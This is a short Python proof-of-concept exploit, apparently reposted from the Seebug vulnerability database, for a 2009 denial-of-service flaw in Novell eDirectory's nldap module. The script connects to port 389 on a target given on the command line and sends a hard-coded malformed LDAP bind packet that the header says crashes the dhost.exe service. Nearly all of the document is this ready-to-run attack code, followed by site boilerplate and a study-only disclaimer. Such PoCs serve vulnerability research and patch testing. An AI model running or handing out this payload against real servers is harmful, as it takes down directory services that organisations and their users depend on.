#!/usr/bin/python # 22/03/2009 # Novell eDirectory 883ftf3 nldap module DOS # Matteo Memelli - offensive-security.com # ryujin ___ @ ___ offensive-security.com # # A malformed bind LDAP packet can make dhost.exe service crashing. # 24/03/2009 Vendor notification; patched in 885 release # import sys from socket import * payload = ( "\x30\x7E\x02\x02\x01\x60\x77\x02\x84\xFF\xFF\xFF\xFF\x03\x04\x84" "\xFF\xFF\xFF\xFF\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61" "\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D" "\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68\x2C\x64" "\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e" "\x6e\x61\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64" "\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68" "\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x63\x6F\x6D\x80\x00" ) s = socket(AF_INET, SOCK_STREAM) print 'connecting...' s.connect((sys.argv[1], 389)) print 'sending payload...' s.send(payload) print s.recv(1024) s.close() print 'Done!'
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论